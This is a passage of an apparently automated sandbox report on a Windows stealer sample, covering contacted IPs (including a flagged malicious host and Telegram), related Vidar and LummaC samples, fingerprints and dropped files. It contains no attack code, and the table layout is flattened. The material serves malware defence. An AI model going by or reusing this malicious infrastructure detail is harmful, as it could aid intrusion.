                                                                                                                                                                                                                                      https://ch.search.yahoo.com/favicon.icofrom_play_apichrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625679705.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        https://docs.google.com/document/installwebapp?usp=chrome_defaultltchrome.exe, 00000010.00000002.2714029253.00007C1C00D3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          https://www.youtube.com/s/notifications/manifest/cr_install.htmlchrome.exe, 00000010.00000002.2715404107.00007C1C01054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714074595.00007C1C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high

                                                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                            20.189.173.1
                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                            149.154.167.99
                                                                                                                                                                                                                                            		t.meUnited Kingdom
                                                                                                                                                                                                                                            		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                            108.139.47.92
                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                                            142.250.181.68
                                                                                                                                                                                                                                            		www.google.comUnited States
                                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                                            20.110.205.119
                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                            204.79.197.219
                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                            142.250.181.65
                                                                                                                                                                                                                                            		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                                            23.200.88.9
                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                            		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                                            172.64.41.3
                                                                                                                                                                                                                                            		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            23.57.90.143
                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                            		35994AKAMAI-ASUSfalse
                                                                                                                                                                                                                                            23.57.90.145
                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                            		35994AKAMAI-ASUSfalse
                                                                                                                                                                                                                                            116.203.8.178
                                                                                                                                                                                                                                            		fa5lt.xyzGermany
                                                                                                                                                                                                                                            		24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                            23.57.90.162
                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                            		35994AKAMAI-ASUSfalse
                                                                                                                                                                                                                                            239.255.255.250
                                                                                                                                                                                                                                            		unknownReserved
                                                                                                                                                                                                                                            		unknownunknownfalse

                                                                                                                                                                                                                                            Private

                                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                                            192.168.2.5
                                                                                                                                                                                                                                            127.0.0.1

                                                                                                                                                                                                                                            General Information

                                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                            Analysis ID:1581382
                                                                                                                                                                                                                                            Start date and time:2024-12-27 14:45:07 +01:00
                                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                            Overall analysis duration:0h 7m 55s
                                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                            Number of analysed new started processes analysed:34
                                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                                            Sample name:JA7cOAGHym.exe
                                                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                                                            Original Sample Name:6e90f0e42285206dce01ffbbd748b081.exe
                                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@89/290@21/16
                                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                                            • Number of executed functions: 78
                                                                                                                                                                                                                                            • Number of non-executed functions: 300
                                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 20.12.23.50, 199.232.214.172, 192.229.221.95, 20.3.187.198, 13.95.31.18, 172.217.19.227, 64.233.161.84, 142.250.181.142, 172.217.17.46, 142.250.181.99, 142.250.181.138, 172.217.19.170, 142.250.181.106, 172.217.17.74, 142.250.181.10, 172.217.17.42, 216.58.208.234, 142.250.181.74, 172.217.21.42, 172.217.19.234, 172.217.19.202, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 13.107.6.158, 51.137.3.145, 23.32.239.18, 23.32.239.56, 2.16.158.170, 2.16.158.82, 2.16.158.176, 2.16.158.186, 2.16.158.90, 2.16.158.179, 2.16.158.26, 2.16.158.169, 2.16.158.192, 108.141.37.120, 23.32.239.58, 2.19.198.17, 2.16.158.72, 2.16.158.35, 2.16.158.33, 2.16.158.51, 2.16.158.56, 2.16.158.59, 2.16.158.27, 2.16.158.43, 2.16.158.50, 92.123.103.113, 92.123.103.106, 92.123.103.105, 92.123.103.114, 92.123.103.107, 92.123.103.120, 92.123.103.17, 92.123.103.19, 92.123.103.24, 142.250.80.99, 142.250.64.67, 13.107.246.63, 23.218.208.109, 94.245.104.56, 40.126.53.12, 23.200.0.34, 13.91.222.6
                                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, img-s-msn-com.akamaized.net, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, wu-b-net.trafficmanager.net, e28578.d.akamaiedge.net, www.bing.com, prod-agic-we-2.westeurope.cloudapp.azure.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, prod-agic-we-5.westeurope.cloudapp.azure.com, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, redirector.gvt1.com, www.bing.com.edgekey.net, th.bing.com, glb.cws.prod.dcat.dsp.traff
                                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                                            08:45:56API Interceptor1x Sleep call for process: JA7cOAGHym.exe modified
                                                                                                                                                                                                                                            08:46:02API Interceptor7x Sleep call for process: Pokemon.com modified

                                                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                                                            IPs

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            20.189.173.1Fw 2025 Employee Handbook For all Colhca Employees Ref THEFUE.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              JHPvqMzKbz.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                c20346ef.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  https://url.uk.m.mimecastprotect.com/s/879wCp9pjInpwnDHPf7CG_Zsy?domain=aerographicsut-my.sharepoint.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                    Aisha C. Yetman shared you a document..msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/s/%E2%80%8Bcd%C2%ADlsao%C2%ADmja%C2%ADte%C2%AD.h%C2%ADi%E2%80%8Ba%C2%ADz%C2%ADw%E2%80%8B.i%C2%ADr%2F.well-know%2Fre%2F1781008251/amVzc2ljYS5tZWFyc0BwZXJzaW1tb25ob21lcy5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        https://abex.co.in/1/?clickid=crj4hrne79is73f9g3kg&lp_key=17263275da2fd8c1a244a24d3218001b69e7968282&t1=1083194587&t2=.us.05.desktop.nonadult.windows.edge&key=7dfcf14e88e3f6336162#Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          i45qm2CawaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            https://homedigital.cloud/YoM8n6uU7J/.d7g/3Ugx2oDrh4/aGVscGRlc2tAZ290ZWNobm9sb2dpeC5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                              Quarantined Messages(6).zipGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                                http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • telegram.org/
                                                                                                                                                                                                                                                                http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                                http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • telegram.org/
                                                                                                                                                                                                                                                                http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • telegram.org/
                                                                                                                                                                                                                                                                http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • telegram.org/?setln=pl
                                                                                                                                                                                                                                                                http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • telegram.org/
                                                                                                                                                                                                                                                                http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • telegram.dog/
                                                                                                                                                                                                                                                                LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                                • t.me/cinoshibot
                                                                                                                                                                                                                                                                jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                                • t.me/cinoshibot

                                                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                t.mehttps://linkenbio.net/59125/247Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                yoda.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                chrome.cloudflare-dns.comaD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                WRD1792.docx.docGet hashmaliciousDynamerBrowse
                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                https://jkqbjwq.maxiite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                bg.microsoft.map.fastly.netwp.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                                final.exeGet hashmaliciousMeterpreterBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                n5Szx8qsFB.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                A4FY1OA97K.lnkGet hashmaliciousDanaBotBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                                54861 Proforma Invoice AMC2273745.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                                P9UXlizXVS.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                Setup64v4.1.9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172

                                                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                TELEGRAMRUhttps://linkenbio.net/59125/247Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                yoda.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                                                HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                AMAZON-02USbyte.ppc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                                                                                .i.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                                                                                grand-theft-auto-5-theme-1-installer_qb8W-j1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 44.236.142.208
                                                                                                                                                                                                                                                                Space.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 54.217.10.153
                                                                                                                                                                                                                                                                https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.53.112.200
                                                                                                                                                                                                                                                                https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.53.112.200
                                                                                                                                                                                                                                                                https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.53.112.200
                                                                                                                                                                                                                                                                https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.53.112.200
                                                                                                                                                                                                                                                                sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                                                                                db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                                                                • 35.73.111.15
                                                                                                                                                                                                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUSOiMp3TH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 20.233.83.145
                                                                                                                                                                                                                                                                5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                                                                                                                                                                                • 20.233.83.145
                                                                                                                                                                                                                                                                DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                • 20.189.173.22
                                                                                                                                                                                                                                                                aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 204.79.197.219
                                                                                                                                                                                                                                                                installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 20.42.73.30
                                                                                                                                                                                                                                                                din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 51.104.15.253
                                                                                                                                                                                                                                                                lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 204.79.197.219
                                                                                                                                                                                                                                                                phish_alert_iocp_v1.4.48 - 2024-12-26T095152.060.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.109.68.129
                                                                                                                                                                                                                                                                phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 20.42.73.24
                                                                                                                                                                                                                                                                HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 204.79.197.219

                                                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                1138de370e523e824bbca92d049a3777GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.1.237.91
                                                                                                                                                                                                                                                                ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.1.237.91
                                                                                                                                                                                                                                                                7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.1.237.91
                                                                                                                                                                                                                                                                aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 23.1.237.91
                                                                                                                                                                                                                                                                lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 23.1.237.91
                                                                                                                                                                                                                                                                0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.1.237.91
                                                                                                                                                                                                                                                                pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.1.237.91
                                                                                                                                                                                                                                                                z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.1.237.91
                                                                                                                                                                                                                                                                COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.1.237.91
                                                                                                                                                                                                                                                                HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 23.1.237.91
                                                                                                                                                                                                                                                                37f463bf4616ecd445d4a1937da06e19EB2UOXRNsE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 116.203.8.178
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                gshv2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 116.203.8.178
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                DOTA2#U89c6#U8ddd#U63d2#U4ef6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 116.203.8.178
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                n5Szx8qsFB.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 116.203.8.178
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                InExYnlM0N.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 116.203.8.178
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                K9esyY0r4G.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 116.203.8.178
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                                                                                                                                                                                                                • 116.203.8.178
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 116.203.8.178
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 116.203.8.178
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 116.203.8.178
                                                                                                                                                                                                                                                                • 149.154.167.99

                                                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\208079\Pokemon.comappFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                  FloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                    installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                          yoda.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                            lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                  Set-up.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                                                                                                    C:\ProgramData\79RQ1VS0ZU3E\68QI5X

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):155648
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                    MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                    Malicious:false
